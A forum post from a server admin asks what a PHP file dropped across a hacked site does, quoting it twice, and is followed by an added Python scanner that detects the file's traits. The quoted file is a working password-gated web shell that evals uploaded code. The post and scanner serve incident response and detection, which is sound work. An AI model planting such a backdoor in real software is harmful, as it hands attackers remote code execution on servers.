Hack question



I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what the purpose of this code is? The hack places this file in numerous dirs on the site, I assume using a PHP script because the owner is "nobody".

I can sort of figure out what it is doing, but I can't figure out what the hacker is using it for.

Incidentally, I've changed all passwords and restricted FTP to two people. I see no sign that any code is written by the site owner, i.e., FTP. And I've looked carefully for suspect PHP files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
    echo "$t\n";
} ;
function testdata($t)
{
    say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
    } else
    {
        testdata('f');
    } ;
} else
{
    testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>
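
An added example, not part of the original post: the quoted file passes the contents of an uploaded temp file to eval() once an MD5 check on a POST field succeeds, so a sweep of the site tree can look for those three traits together. The indicator names, `score_php`, `scan_tree` and the sample files below are this example's own, and the regexes are assumptions about how copies of the file may vary.

```python
import os
import re
import tempfile

# Traits visible in the file quoted in the post (names here are this example's own).
INDICATORS = {
    "eval_of_variable": re.compile(rb"\beval\s*\(\s*\$\w+", re.I),
    "reads_upload_tmp_file": re.compile(
        rb"\$(HTTP_POST_FILES|_FILES)\s*\[[^\]]+\]\s*\[\s*[\"']tmp_name", re.I),
    "md5_gate_on_request": re.compile(rb"md5\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
}
PHP_EXT = (".php", ".php3", ".php4", ".php5", ".phtml", ".inc")

def score_php(data):
    """Return the sorted names of the indicators found in one file's bytes."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root, min_hits=2, owner_uid=None):
    """Return [(path, hits)] for PHP files under root with >= min_hits indicators.
    owner_uid optionally limits the scan to files owned by that uid, such as the
    web server account ("nobody" in the post)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                if owner_uid is not None and os.lstat(path).st_uid != owner_uid:
                    continue
                with open(path, "rb") as fh:
                    hits = score_php(fh.read(1 << 20))  # first 1 MiB is enough
            except OSError:
                continue  # unreadable entry: skip it, keep scanning
            if len(hits) >= min_hits:
                findings.append((path, hits))
    return sorted(findings)

def demo():
    """Scan a constructed tree: one non-functional fragment with the dropped file's
    traits, and one ordinary upload handler that must not be flagged."""
    dropped = b'<?php /* constructed */ md5($_POST["p"]); $HTTP_POST_FILES["f"]["tmp_name"]; eval($code);'
    benign = b'<?php move_uploaded_file($_FILES["f"]["tmp_name"], $dest);'
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        for rel, body in (("images/x.php", dropped), ("upload.php", benign)):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        return [(os.path.relpath(p, root), h) for p, h in scan_tree(root)]

if __name__ == "__main__":
    print(demo())
```

Requiring two indicators keeps ordinary upload handlers out of the results; passing `owner_uid` narrows the sweep to files created by the web server account rather than over FTP.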